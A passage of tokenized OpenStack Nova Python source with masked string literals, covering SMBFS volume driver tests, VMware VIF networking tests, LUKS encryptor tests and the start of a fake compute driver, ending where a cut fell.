[ <EOL> ( '<STR_LIT>' , '<STR_LIT>' , export_mnt_base ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> export_string , export_mnt_base ) , <EOL> ( '<STR_LIT>' , export_mnt_base ) ] <EOL> self . assertEqual ( expected_commands , self . executes ) <EOL> def test_libvirt_smbfs_driver_already_mounted ( self ) : <EOL> libvirt_driver = smbfs . LibvirtSMBFSVolumeDriver ( self . fake_conn ) <EOL> export_string = '<STR_LIT>' <EOL> export_mnt_base = os . path . join ( self . mnt_base , <EOL> utils . get_hash_str ( export_string ) ) <EOL> connection_info = { '<STR_LIT:data>' : { '<STR_LIT>' : export_string , <EOL> '<STR_LIT:name>' : self . 
name } } <EOL> libvirt_driver . connect_volume ( connection_info , self . disk_info ) <EOL> libvirt_driver . disconnect_volume ( connection_info , "<STR_LIT>" ) <EOL> expected_commands = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' , export_mnt_base , <EOL> '<STR_LIT>' , export_string ) , <EOL> ( '<STR_LIT>' , export_mnt_base ) ] <EOL> self . assertEqual ( expected_commands , self . executes ) <EOL> def test_libvirt_smbfs_driver_get_config ( self ) : <EOL> libvirt_driver = smbfs . LibvirtSMBFSVolumeDriver ( self . fake_conn ) <EOL> export_string = '<STR_LIT>' <EOL> export_mnt_base = os . path . join ( self . mnt_base , <EOL> utils . get_hash_str ( export_string ) ) <EOL> file_path = os . path . join ( export_mnt_base , self . name ) <EOL> connection_info = { '<STR_LIT:data>' : { '<STR_LIT>' : export_string , <EOL> '<STR_LIT:name>' : self . name , <EOL> '<STR_LIT>' : file_path } } <EOL> conf = libvirt_driver . get_config ( connection_info , self . disk_info ) <EOL> tree = conf . format_dom ( ) <EOL> self . _assertFileTypeEquals ( tree , file_path ) <EOL> @ mock . patch . object ( libvirt_utils , '<STR_LIT>' ) <EOL> def test_libvirt_smbfs_driver_with_opts ( self , mock_is_mounted ) : <EOL> mock_is_mounted . return_value = False <EOL> libvirt_driver = smbfs . LibvirtSMBFSVolumeDriver ( self . fake_conn ) <EOL> export_string = '<STR_LIT>' <EOL> options = '<STR_LIT>' <EOL> export_mnt_base = os . path . join ( self . mnt_base , <EOL> utils . get_hash_str ( export_string ) ) <EOL> connection_info = { '<STR_LIT:data>' : { '<STR_LIT>' : export_string , <EOL> '<STR_LIT:name>' : self . name , <EOL> '<STR_LIT>' : options } } <EOL> libvirt_driver . connect_volume ( connection_info , self . disk_info ) <EOL> libvirt_driver . 
disconnect_volume ( connection_info , "<STR_LIT>" ) <EOL> expected_commands = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' , export_mnt_base ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> export_string , export_mnt_base ) , <EOL> ( '<STR_LIT>' , export_mnt_base ) ] <EOL> self . assertEqual ( expected_commands , self . executes ) </s>
<s> import mock <EOL> from oslo_vmware import exceptions as vexc <EOL> from oslo_vmware import vim_util <EOL> from nova import exception <EOL> from nova . network import model as network_model <EOL> from nova import test <EOL> from nova . tests . unit import matchers <EOL> from nova . tests . unit import utils <EOL> from nova . tests . unit . virt . vmwareapi import fake <EOL> from nova . virt . vmwareapi import constants <EOL> from nova . virt . vmwareapi import network_util <EOL> from nova . virt . vmwareapi import vif <EOL> from nova . virt . vmwareapi import vm_util <EOL> class VMwareVifTestCase ( test . NoDBTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( VMwareVifTestCase , self ) . setUp ( ) <EOL> self . flags ( vlan_interface = '<STR_LIT>' , group = '<STR_LIT>' ) <EOL> network = network_model . Network ( id = <NUM_LIT:0> , <EOL> bridge = '<STR_LIT>' , <EOL> label = '<STR_LIT>' , <EOL> vlan = <NUM_LIT:3> , <EOL> bridge_interface = '<STR_LIT>' , <EOL> injected = True ) <EOL> self . _network = network <EOL> self . vif = network_model . NetworkInfo ( [ <EOL> network_model . VIF ( id = None , <EOL> address = '<STR_LIT>' , <EOL> network = network , <EOL> type = None , <EOL> devname = None , <EOL> ovs_interfaceid = None , <EOL> rxtx_cap = <NUM_LIT:3> ) <EOL> ] ) [ <NUM_LIT:0> ] <EOL> self . session = fake . FakeSession ( ) <EOL> self . cluster = None <EOL> def tearDown ( self ) : <EOL> super ( VMwareVifTestCase , self ) . tearDown ( ) <EOL> def test_ensure_vlan_bridge ( self ) : <EOL> self . mox . StubOutWithMock ( network_util , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( network_util , <EOL> '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( network_util , <EOL> '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( network_util , '<STR_LIT>' ) <EOL> network_util . get_network_with_the_name ( self . session , '<STR_LIT>' , <EOL> self . cluster ) . AndReturn ( None ) <EOL> network_util . get_vswitch_for_vlan_interface ( self . 
session , '<STR_LIT>' , <EOL> self . cluster ) . AndReturn ( '<STR_LIT>' ) <EOL> network_util . check_if_vlan_interface_exists ( self . session , '<STR_LIT>' , <EOL> self . cluster ) . AndReturn ( True ) <EOL> network_util . create_port_group ( self . session , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:3> , <EOL> self . cluster ) <EOL> network_util . get_network_with_the_name ( self . session , '<STR_LIT>' , None ) <EOL> self . mox . ReplayAll ( ) <EOL> vif . ensure_vlan_bridge ( self . session , self . vif , create_vlan = True ) <EOL> def test_ensure_vlan_bridge_without_vlan ( self ) : <EOL> self . mox . StubOutWithMock ( network_util , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( network_util , <EOL> '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( network_util , <EOL> '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( network_util , '<STR_LIT>' ) <EOL> network_util . get_network_with_the_name ( self . session , '<STR_LIT>' , <EOL> self . cluster ) . AndReturn ( None ) <EOL> network_util . get_vswitch_for_vlan_interface ( self . session , '<STR_LIT>' , <EOL> self . cluster ) . AndReturn ( '<STR_LIT>' ) <EOL> network_util . check_if_vlan_interface_exists ( self . session , '<STR_LIT>' , <EOL> self . cluster ) . AndReturn ( True ) <EOL> network_util . create_port_group ( self . session , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:0> , <EOL> self . cluster ) <EOL> network_util . get_network_with_the_name ( self . session , '<STR_LIT>' , None ) <EOL> self . mox . ReplayAll ( ) <EOL> vif . ensure_vlan_bridge ( self . session , self . vif , create_vlan = False ) <EOL> def test_ensure_vlan_bridge_with_network ( self ) : <EOL> self . mox . StubOutWithMock ( network_util , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( network_util , <EOL> '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( network_util , <EOL> '<STR_LIT>' ) <EOL> self . mox . 
StubOutWithMock ( network_util , '<STR_LIT>' ) <EOL> vm_network = { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } <EOL> network_util . get_network_with_the_name ( self . session , '<STR_LIT>' , <EOL> self . cluster ) . AndReturn ( vm_network ) <EOL> self . mox . ReplayAll ( ) <EOL> vif . ensure_vlan_bridge ( self . session , self . vif , create_vlan = False ) <EOL> def test_ensure_vlan_bridge_with_existing_dvs ( self ) : <EOL> network_ref = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:type>' : '<STR_LIT>' } <EOL> self . mox . StubOutWithMock ( network_util , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( network_util , <EOL> '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( network_util , <EOL> '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( network_util , '<STR_LIT>' ) <EOL> network_util . get_network_with_the_name ( self . session , '<STR_LIT>' , <EOL> self . cluster ) . AndReturn ( network_ref ) <EOL> self . mox . ReplayAll ( ) <EOL> ref = vif . ensure_vlan_bridge ( self . session , <EOL> self . vif , <EOL> create_vlan = False ) <EOL> self . assertThat ( ref , matchers . DictMatches ( network_ref ) ) <EOL> def test_get_network_ref_flat_dhcp ( self ) : <EOL> self . mox . StubOutWithMock ( vif , '<STR_LIT>' ) <EOL> vif . ensure_vlan_bridge ( self . session , self . vif , cluster = self . cluster , <EOL> create_vlan = False ) <EOL> self . mox . ReplayAll ( ) <EOL> vif . get_network_ref ( self . session , self . cluster , self . vif , False ) <EOL> def test_get_network_ref_bridge ( self ) : <EOL> self . mox . StubOutWithMock ( vif , '<STR_LIT>' ) <EOL> vif . ensure_vlan_bridge ( self . session , self . vif , cluster = self . cluster , <EOL> create_vlan = True ) <EOL> self . mox . ReplayAll ( ) <EOL> network = network_model . 
Network ( id = <NUM_LIT:0> , <EOL> bridge = '<STR_LIT>' , <EOL> label = '<STR_LIT>' , <EOL> vlan = <NUM_LIT:3> , <EOL> bridge_interface = '<STR_LIT>' , <EOL> injected = True , <EOL> should_create_vlan = True ) <EOL> self . vif = network_model . NetworkInfo ( [ <EOL> network_model . VIF ( id = None , <EOL> address = '<STR_LIT>' , <EOL> network = network , <EOL> type = None , <EOL> devname = None , <EOL> ovs_interfaceid = None , <EOL> rxtx_cap = <NUM_LIT:3> ) <EOL> ] ) [ <NUM_LIT:0> ] <EOL> vif . get_network_ref ( self . session , self . cluster , self . vif , False ) <EOL> def test_create_port_group_already_exists ( self ) : <EOL> def fake_call_method ( module , method , * args , ** kwargs ) : <EOL> if method == '<STR_LIT>' : <EOL> raise vexc . AlreadyExistsException ( ) <EOL> with test . nested ( <EOL> mock . patch . object ( vm_util , '<STR_LIT>' ) , <EOL> mock . patch . object ( vm_util , '<STR_LIT>' ) , <EOL> mock . patch . object ( self . session , '<STR_LIT>' , <EOL> fake_call_method ) <EOL> ) as ( _add_vswitch , _get_host , _call_method ) : <EOL> network_util . create_port_group ( self . session , '<STR_LIT>' , <EOL> '<STR_LIT>' , vlan_id = <NUM_LIT:0> , <EOL> cluster = None ) <EOL> def test_create_port_group_exception ( self ) : <EOL> def fake_call_method ( module , method , * args , ** kwargs ) : <EOL> if method == '<STR_LIT>' : <EOL> raise vexc . VMwareDriverException ( ) <EOL> with test . nested ( <EOL> mock . patch . object ( vm_util , '<STR_LIT>' ) , <EOL> mock . patch . object ( vm_util , '<STR_LIT>' ) , <EOL> mock . patch . object ( self . session , '<STR_LIT>' , <EOL> fake_call_method ) <EOL> ) as ( _add_vswitch , _get_host , _call_method ) : <EOL> self . assertRaises ( vexc . VMwareDriverException , <EOL> network_util . create_port_group , <EOL> self . session , '<STR_LIT>' , <EOL> '<STR_LIT>' , vlan_id = <NUM_LIT:0> , <EOL> cluster = None ) <EOL> def test_get_vif_info_none ( self ) : <EOL> vif_info = vif . 
get_vif_info ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , None ) <EOL> self . assertEqual ( [ ] , vif_info ) <EOL> def test_get_vif_info_empty_list ( self ) : <EOL> vif_info = vif . get_vif_info ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , [ ] ) <EOL> self . assertEqual ( [ ] , vif_info ) <EOL> @ mock . patch . object ( vif , '<STR_LIT>' , return_value = '<STR_LIT>' ) <EOL> def test_get_vif_info ( self , mock_get_network_ref ) : <EOL> network_info = utils . get_test_network_info ( ) <EOL> vif_info = vif . get_vif_info ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , network_info ) <EOL> expected = [ { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ] <EOL> self . assertEqual ( expected , vif_info ) <EOL> @ mock . patch . object ( vif , '<STR_LIT>' ) <EOL> def test_get_neutron_network_ovs_integration_bridge ( self , <EOL> mock_check ) : <EOL> self . flags ( integration_bridge = '<STR_LIT>' , group = '<STR_LIT>' ) <EOL> vif_info = network_model . NetworkInfo ( [ <EOL> network_model . VIF ( type = network_model . VIF_TYPE_OVS , <EOL> address = '<STR_LIT>' , <EOL> network = self . _network ) ] <EOL> ) [ <NUM_LIT:0> ] <EOL> network_ref = vif . _get_neutron_network ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> vif_info ) <EOL> expected_ref = { '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False } <EOL> self . assertEqual ( expected_ref , network_ref ) <EOL> mock_check . assert_called_once_with ( '<STR_LIT>' ) <EOL> @ mock . patch . object ( vif , '<STR_LIT>' ) <EOL> def test_get_neutron_network_ovs ( self , mock_check ) : <EOL> vif_info = network_model . NetworkInfo ( [ <EOL> network_model . VIF ( type = network_model . VIF_TYPE_OVS , <EOL> address = '<STR_LIT>' , <EOL> network = self . 
_network ) ] <EOL> ) [ <NUM_LIT:0> ] <EOL> network_ref = vif . _get_neutron_network ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> vif_info ) <EOL> expected_ref = { '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } <EOL> self . assertEqual ( expected_ref , network_ref ) <EOL> mock_check . assert_called_once_with ( '<STR_LIT>' ) <EOL> @ mock . patch . object ( vif , '<STR_LIT>' ) <EOL> def test_get_neutron_network_ovs_logical_switch_id ( self , mock_check ) : <EOL> vif_info = network_model . NetworkInfo ( [ <EOL> network_model . VIF ( type = network_model . VIF_TYPE_OVS , <EOL> address = '<STR_LIT>' , <EOL> network = self . _network , <EOL> details = { '<STR_LIT>' : <EOL> '<STR_LIT>' } ) ] <EOL> ) [ <NUM_LIT:0> ] <EOL> network_ref = vif . _get_neutron_network ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> vif_info ) <EOL> expected_ref = { '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } <EOL> self . assertEqual ( expected_ref , network_ref ) <EOL> mock_check . assert_called_once_with ( '<STR_LIT>' ) <EOL> @ mock . patch . object ( network_util , '<STR_LIT>' ) <EOL> def test_get_neutron_network_dvs ( self , mock_network_name ) : <EOL> fake_network_obj = { '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> mock_network_name . return_value = fake_network_obj <EOL> vif_info = network_model . NetworkInfo ( [ <EOL> network_model . VIF ( type = network_model . VIF_TYPE_DVS , <EOL> address = '<STR_LIT>' , <EOL> network = self . _network ) ] <EOL> ) [ <NUM_LIT:0> ] <EOL> network_ref = vif . _get_neutron_network ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> vif_info ) <EOL> mock_network_name . assert_called_once_with ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( fake_network_obj , network_ref ) <EOL> @ mock . patch . 
object ( network_util , '<STR_LIT>' , <EOL> return_value = None ) <EOL> def test_get_neutron_network_dvs_no_match ( self , mock_network_name ) : <EOL> vif_info = network_model . NetworkInfo ( [ <EOL> network_model . VIF ( type = network_model . VIF_TYPE_DVS , <EOL> address = '<STR_LIT>' , <EOL> network = self . _network ) ] <EOL> ) [ <NUM_LIT:0> ] <EOL> self . assertRaises ( exception . NetworkNotFoundForBridge , <EOL> vif . _get_neutron_network , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> vif_info ) <EOL> def test_get_neutron_network_invalid_type ( self ) : <EOL> vif_info = network_model . NetworkInfo ( [ <EOL> network_model . VIF ( address = '<STR_LIT>' , <EOL> network = self . _network ) ] <EOL> ) [ <NUM_LIT:0> ] <EOL> self . assertRaises ( exception . InvalidInput , <EOL> vif . _get_neutron_network , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> vif_info ) <EOL> @ mock . patch . object ( vif . LOG , '<STR_LIT>' ) <EOL> @ mock . patch . object ( vim_util , '<STR_LIT>' , <EOL> return_value = '<STR_LIT>' ) <EOL> def test_check_invalid_ovs_version ( self , mock_version , mock_warning ) : <EOL> vif . _check_ovs_supported_version ( '<STR_LIT>' ) <EOL> expected_arg = { '<STR_LIT:version>' : constants . MIN_VC_OVS_VERSION } <EOL> version_arg_found = False <EOL> for call in mock_warning . call_args_list : <EOL> if call [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] == expected_arg : <EOL> version_arg_found = True <EOL> break <EOL> self . assertTrue ( version_arg_found ) </s>
<s> import mock <EOL> from oslo_concurrency import processutils <EOL> from nova . tests . unit . volume . encryptors import test_cryptsetup <EOL> from nova . volume . encryptors import luks <EOL> class LuksEncryptorTestCase ( test_cryptsetup . CryptsetupEncryptorTestCase ) : <EOL> def _create ( self , connection_info ) : <EOL> return luks . LuksEncryptor ( connection_info ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_is_luks ( self , mock_execute ) : <EOL> luks . is_luks ( self . dev_path ) <EOL> mock_execute . assert_has_calls ( [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , self . dev_path , <EOL> run_as_root = True , check_exit_code = True ) , <EOL> ] , any_order = False ) <EOL> self . assertEqual ( <NUM_LIT:1> , mock_execute . call_count ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_is_luks_with_error ( self , mock_execute , mock_log ) : <EOL> error_msg = "<STR_LIT>" % self . dev_path <EOL> mock_execute . side_effect = processutils . ProcessExecutionError ( exit_code = <NUM_LIT:1> , <EOL> stderr = error_msg ) <EOL> luks . is_luks ( self . dev_path ) <EOL> mock_execute . assert_has_calls ( [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , self . dev_path , <EOL> run_as_root = True , check_exit_code = True ) , <EOL> ] ) <EOL> self . assertEqual ( <NUM_LIT:1> , mock_execute . call_count ) <EOL> self . assertEqual ( <NUM_LIT:1> , mock_log . warning . call_count ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test__format_volume ( self , mock_execute ) : <EOL> self . encryptor . _format_volume ( "<STR_LIT>" ) <EOL> mock_execute . assert_has_calls ( [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , self . dev_path , <EOL> process_input = '<STR_LIT>' , <EOL> run_as_root = True , check_exit_code = True , attempts = <NUM_LIT:3> ) , <EOL> ] ) <EOL> self . assertEqual ( <NUM_LIT:1> , mock_execute . call_count ) <EOL> @ mock . 
patch ( '<STR_LIT>' ) <EOL> def test__open_volume ( self , mock_execute ) : <EOL> self . encryptor . _open_volume ( "<STR_LIT>" ) <EOL> mock_execute . assert_has_calls ( [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , self . dev_path , <EOL> self . dev_name , process_input = '<STR_LIT>' , <EOL> run_as_root = True , check_exit_code = True ) , <EOL> ] ) <EOL> self . assertEqual ( <NUM_LIT:1> , mock_execute . call_count ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_attach_volume ( self , mock_execute ) : <EOL> self . encryptor . _get_key = mock . MagicMock ( ) <EOL> self . encryptor . _get_key . return_value = test_cryptsetup . fake__get_key ( None ) <EOL> self . encryptor . attach_volume ( None ) <EOL> mock_execute . assert_has_calls ( [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , self . dev_path , <EOL> self . dev_name , process_input = '<STR_LIT:0>' * <NUM_LIT:32> , <EOL> run_as_root = True , check_exit_code = True ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' % self . dev_name , self . symlink_path , <EOL> run_as_root = True , check_exit_code = True ) , <EOL> ] ) <EOL> self . assertEqual ( <NUM_LIT:2> , mock_execute . call_count ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_attach_volume_not_formatted ( self , mock_execute ) : <EOL> self . encryptor . _get_key = mock . MagicMock ( ) <EOL> self . encryptor . _get_key . return_value = test_cryptsetup . fake__get_key ( None ) <EOL> mock_execute . side_effect = [ <EOL> processutils . ProcessExecutionError ( exit_code = <NUM_LIT:1> ) , <EOL> processutils . ProcessExecutionError ( exit_code = <NUM_LIT:1> ) , <EOL> mock . DEFAULT , <EOL> mock . DEFAULT , <EOL> mock . DEFAULT , <EOL> ] <EOL> self . encryptor . attach_volume ( None ) <EOL> mock_execute . assert_has_calls ( [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , self . dev_path , <EOL> self . 
dev_name , process_input = '<STR_LIT:0>' * <NUM_LIT:32> , <EOL> run_as_root = True , check_exit_code = True ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , self . dev_path , <EOL> run_as_root = True , check_exit_code = True ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , self . dev_path , process_input = '<STR_LIT:0>' * <NUM_LIT:32> , <EOL> run_as_root = True , check_exit_code = True , attempts = <NUM_LIT:3> ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , self . dev_path , <EOL> self . dev_name , process_input = '<STR_LIT:0>' * <NUM_LIT:32> , <EOL> run_as_root = True , check_exit_code = True ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' % self . dev_name , self . symlink_path , <EOL> run_as_root = True , check_exit_code = True ) , <EOL> ] , any_order = False ) <EOL> self . assertEqual ( <NUM_LIT:5> , mock_execute . call_count ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_attach_volume_fail ( self , mock_execute ) : <EOL> self . encryptor . _get_key = mock . MagicMock ( ) <EOL> self . encryptor . _get_key . return_value = test_cryptsetup . fake__get_key ( None ) <EOL> mock_execute . side_effect = [ <EOL> processutils . ProcessExecutionError ( exit_code = <NUM_LIT:1> ) , <EOL> mock . DEFAULT , <EOL> ] <EOL> self . assertRaises ( processutils . ProcessExecutionError , <EOL> self . encryptor . attach_volume , None ) <EOL> mock_execute . assert_has_calls ( [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , self . dev_path , <EOL> self . dev_name , process_input = '<STR_LIT:0>' * <NUM_LIT:32> , <EOL> run_as_root = True , check_exit_code = True ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , self . dev_path , <EOL> run_as_root = True , check_exit_code = True ) , <EOL> ] , any_order = False ) <EOL> self . assertEqual ( <NUM_LIT:2> , mock_execute . call_count ) <EOL> @ mock . 
patch ( '<STR_LIT>' ) <EOL> def test__close_volume ( self , mock_execute ) : <EOL> self . encryptor . detach_volume ( ) <EOL> mock_execute . assert_has_calls ( [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , self . dev_name , <EOL> attempts = <NUM_LIT:3> , run_as_root = True , check_exit_code = True ) , <EOL> ] ) <EOL> self . assertEqual ( <NUM_LIT:1> , mock_execute . call_count ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_detach_volume ( self , mock_execute ) : <EOL> self . encryptor . detach_volume ( ) <EOL> mock_execute . assert_has_calls ( [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , self . dev_name , <EOL> attempts = <NUM_LIT:3> , run_as_root = True , check_exit_code = True ) , <EOL> ] ) <EOL> self . assertEqual ( <NUM_LIT:1> , mock_execute . call_count ) </s>
<s> """<STR_LIT>""" <EOL> import collections <EOL> import contextlib <EOL> from oslo_config import cfg <EOL> from oslo_log import log as logging <EOL> from oslo_serialization import jsonutils <EOL> from oslo_utils import versionutils <EOL> from nova . compute import arch <EOL> from nova . compute import hv_type <EOL> from nova . compute import power_state <EOL> from nova . compute import task_states <EOL> from nova . compute import vm_mode <EOL> from nova . console import type as ctype <EOL> from nova import exception <EOL> from nova . i18n import _LW <EOL> from nova . virt import diagnostics <EOL> from nova . virt import driver <EOL> from nova . virt import hardware <EOL> from nova . virt import virtapi <EOL> CONF = cfg . CONF <EOL> CONF . import_opt ( '<STR_LIT:host>' , '<STR_LIT>' ) <EOL> LOG = logging . getLogger ( __name__ ) <EOL> _FAKE_NODES = None <EOL> def set_nodes ( nodes ) : <EOL> """<STR_LIT>""" <EOL> global _FAKE_NODES <EOL> _FAKE_NODES = nodes <EOL> def restore_nodes ( ) : <EOL> """<STR_LIT>""" <EOL> global _FAKE_NODES <EOL> _FAKE_NODES = [ CONF . host ] <EOL> class FakeInstance ( object ) : <EOL> def __init__ ( self , name , state , uuid ) : <EOL> self . name = name <EOL> self . state = state <EOL> self . uuid = uuid <EOL> def __getitem__ ( self , key ) : <EOL> return getattr ( self , key ) <EOL> class Resources ( object ) : <EOL> vcpus = <NUM_LIT:0> <EOL> memory_mb = <NUM_LIT:0> <EOL> local_gb = <NUM_LIT:0> <EOL> vcpus_used = <NUM_LIT:0> <EOL> memory_mb_used = <NUM_LIT:0> <EOL> local_gb_used = <NUM_LIT:0> <EOL> def __init__ ( self , vcpus = <NUM_LIT:8> , memory_mb = <NUM_LIT> , local_gb = <NUM_LIT> ) : <EOL> self . vcpus = vcpus <EOL> self . memory_mb = memory_mb <EOL> self . local_gb = local_gb <EOL> def claim ( self , vcpus = <NUM_LIT:0> , mem = <NUM_LIT:0> , disk = <NUM_LIT:0> ) : <EOL> self . vcpus_used += vcpus <EOL> self . memory_mb_used += mem <EOL> self . 
local_gb_used += disk <EOL> def release ( self , vcpus = <NUM_LIT:0> , mem = <NUM_LIT:0> , disk = <NUM_LIT:0> ) : <EOL> self . vcpus_used -= vcpus <EOL> self . memory_mb_used -= mem <EOL> self . local_gb_used -= disk <EOL> def dump ( self ) : <EOL> return { <EOL> '<STR_LIT>' : self . vcpus , <EOL> '<STR_LIT>' : self . memory_mb , <EOL> '<STR_LIT>' : self . local_gb , <EOL> '<STR_LIT>' : self . vcpus_used , <EOL> '<STR_LIT>' : self . memory_mb_used , <EOL> '<STR_LIT>' : self . local_gb_used <EOL> } <EOL> class FakeDriver ( driver . ComputeDriver ) : <EOL> capabilities = { <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : True <EOL> } <EOL> vcpus = <NUM_LIT:1000> <EOL> memory_mb = <NUM_LIT> <EOL> local_gb = <NUM_LIT> <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , virtapi , read_only = False ) : <EOL> super ( FakeDriver , self ) . __init__ ( virtapi ) <EOL> self . instances = { } <EOL> self . resources = Resources ( <EOL> vcpus = self . vcpus , <EOL> memory_mb = self . memory_mb , <EOL> local_gb = self . local_gb ) <EOL> self . host_status_base = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : versionutils . convert_version_to_int ( '<STR_LIT:1.0>' ) , <EOL> '<STR_LIT>' : CONF . host , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : [ ( arch . X86_64 , hv_type . FAKE , vm_mode . HVM ) ] , <EOL> '<STR_LIT>' : None , <EOL> } <EOL> self . _mounts = { } <EOL> self . _interfaces = { } <EOL> if not _FAKE_NODES : <EOL> set_nodes ( [ CONF . host ] ) <EOL> def init_host ( self , host ) : <EOL> return <EOL> def list_instances ( self ) : <EOL> return [ self . instances [ uuid ] . name for uuid in self . instances . keys ( ) ] <EOL> def list_instance_uuids ( self ) : <EOL> return self . instances . 
keys ( ) <EOL> def plug_vifs ( self , instance , network_info ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def unplug_vifs ( self , instance , network_info ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def spawn ( self , context , instance , image_meta , injected_files , <EOL> admin_password , network_info = None , block_device_info = None ) : <EOL> uuid = instance . uuid <EOL> state = power_state . RUNNING <EOL> flavor = instance . flavor <EOL> self . resources . claim ( <EOL> vcpus = flavor . vcpus , <EOL> mem = flavor . memory_mb , <EOL> disk = flavor . root_gb ) <EOL> fake_instance = FakeInstance ( instance . name , state , uuid ) <EOL> self . instances [ uuid ] = fake_instance <EOL> def snapshot ( self , context , instance , image_id , update_task_state ) : <EOL> if instance . uuid not in self . instances : <EOL> raise exception . InstanceNotRunning ( instance_id = instance . uuid ) <EOL> update_task_state ( task_state = task_states . IMAGE_UPLOADING ) <EOL> def reboot ( self , context , instance , network_info , reboot_type , <EOL> block_device_info = None , bad_volumes_callback = None ) : <EOL> pass <EOL> def get_host_ip_addr ( self ) : <EOL> return '<STR_LIT>' <EOL> def set_admin_password ( self , instance , new_pass ) : <EOL> pass <EOL> def inject_file ( self , instance , b64_path , b64_contents ) : <EOL> pass <EOL> def resume_state_on_host_boot ( self , context , instance , network_info , <EOL> block_device_info = None ) : <EOL> pass <EOL> def rescue ( self , context , instance , network_info , image_meta , <EOL> rescue_password ) : <EOL> pass <EOL> def unrescue ( self , instance , network_info ) : <EOL> pass <EOL> def poll_rebooting_instances ( self , timeout , instances ) : <EOL> pass <EOL> def migrate_disk_and_power_off ( self , context , instance , dest , <EOL> flavor , network_info , <EOL> block_device_info = None , <EOL> timeout = 